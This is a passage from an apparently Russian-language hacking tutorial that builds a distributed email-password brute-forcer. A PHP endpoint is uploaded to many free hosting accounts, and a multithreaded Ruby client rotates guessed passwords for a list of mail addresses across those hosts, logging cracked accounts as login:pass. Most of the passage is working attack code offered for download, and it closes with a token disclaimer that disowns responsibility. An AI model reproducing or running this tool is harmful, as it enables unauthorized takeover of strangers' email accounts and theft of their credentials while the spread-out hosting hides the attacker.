if (!isset($_POST['pass']) || $_POST['pass']!=$pass) die();
if (!(isset($_POST['op_addr'])) || !(isset($_POST['op_pass']))) die();

$email= new Email($_POST['op_addr']);
echo ‘<ans>’.$email->try_auth($_POST['op_pass']).’</ans>’;
?>

brut.php тоже не является верхом сложности программирования на PHP: сначала мы проверяем логин и пароль админа, затем смотрим присутствуют ли адрес почты и предполагаемый пароль к ней, и в случае если все ништяк пробуем авторизоватся, посредством заранее написанного класса. В конце мы выводим числовой ответ. Тот кому нужны точные ответы  посмотрит lib.php, а я же скажу что 0 – пароль не подошел, 1 – пароль подошел.

На этом с серверной частью закончили, теперь берем эти 3 файла и заливаем на все фрихосты, где удалось зарегать.

Клиент (Ruby-скрипты).

Клиентская часть состоит из 2-х скриптов:

1. config.rb – файл конфигурации
2. main.rb – собственно сам клиент

Сначала рассмотрим кофиг. Представляет он из себя следующее:

#!/usr/bin/ruby

$servers=['lukmus.ru','second.server.ru','third.server.ru','etc.freehost.com']
$path=’/mailbrut/brut.php’

$login=”root”
$pass=”jvgfdhg6hj”

$th_count=3

$fl_addrs=”mail_list”
$fl_log=”mailbrut.log”
$fl_good=”good_accs”

$passes=['pass','qwerty','123456','12345','etc...']

Теперь разберемся в нем:

• $servers – здесь пишем наши фризосты
• $path – путь на фрихостинге до нашей серверной части, на всех сайтах должен быть один и тот же
• $login и $pass – пароль админа брута, должен совпадать с указанными в config.php в серверной части
• $th_count – количество потоков брутфорса, он же у нас многопоточный
• $fl_addrs – файл, записаны почтовые адреса которые мы брутим. Каждая запись должна начинатся с новой строки.
• $fl_log – лог, сюда пишутся все ошибки
• $fl_good – здесь будут сохранятся удачно сбрученные почтовые акки в виде login:pass
• $passes – записываем пароли, на которые брутим

А теперь рассмотрим сам скрипт, который будет выдавать запросы нашим хостингам.

main.rb:

#!/usr/bin/ruby
require ‘net/http’
require ‘config.rb’

class WEB_Server
def initialize (servers)
@servers=servers
@i=0
end#def
def next_s
server=@servers[@i]
@i+=1
if @i>=@servers.size then @i=0 end
return server
end#def
end#class

def log(logfl,msg)
mess=”#{Time.now} <-> #{msg}”
logf=File.new(logfl,’a')
logf.puts mess
logf.close
puts mess
end#def

puts “Lukmus PHP-Ruby WebMailBrut starting…”

servers=WEB_Server.new($servers)
accs=File.new($fl_addrs,’r')
while !accs.eof do
op_addr=accs.gets.chop
while Thread.list.size>$th_count do sleep(1) end
th=Thread.new(op_addr) do |p_addr|
$passes.each do |p_pass|
serv=servers.next_s
http = Net::HTTP.new(serv, 80)
data = “login=#{$login}&pass=#{$pass}&op_addr=#{p_addr}&op_pass=#{p_pass}”
headers = { ‘Content-Type’ => ‘application/x-www-form-urlencoded’}
resp, data = http.post($path, data, headers)
ans=data.split(‘<ans>’)[1].split(‘</ans>’)[0]
case ans
when ‘-3′
log($fl_log,”ERR #3 Can’t open socket <-> #{p_addr}:#{p_pass}”)
when ‘-2′
log($fl_log,”ERR #2 Can’t connect to server <-> #{p_addr}:#{p_pass}”)
when ‘-1′
log($fl_log,”ERR #1 Can’t input login <-> #{p_addr}:#{p_pass}”)
when ’0′
puts “#{serv} <-> #{p_addr}:#{p_pass} <-> invalid pass”
when ’1′
log($fl_good,”#{serv} <-> #{p_addr}:#{p_pass} <-> SUCCESS”)
break

end#case
#http.close
end#each
end#thread
end#while
th.join

Он работает по следующему принципу:

• ОСНОВНОЙ ПОТОК: открывает файл со списком адресов и берет первый
• ОСНОВНОЙ ПОТОК: создает поток, который будет работать с этим адресом
• ПОТОК: берет первый пароль из нашего списка
• ПОТОК: берет первый хостинг и посылает запрос серверу на попытку авторизации
• ПОТОК: далее берет следующий хостинг и следующий пароль и так далее
• ОСНОВНОЙ ПОТОК: берет следующее мыло из списка и создает новый поток под него и так далее.

В случае если поток находит правильный пароль, то поток самоуничтожается, тем самым пресекая бессмысленные попытки авторизации с оставшимися, заведомо ложными паролями.

Ну вот и все, как запустить скрипт Ruby можно прочитать здесь, а скачвть все это дело одним архивом можно здесь

Статья является плодом бурной фантазии автора и не призывает ни к каким действиям,
противоречащим законодательству. Ответственность за использование материала ложиться только на вас!
Любые совпадения с реальными людьми считаются случайными.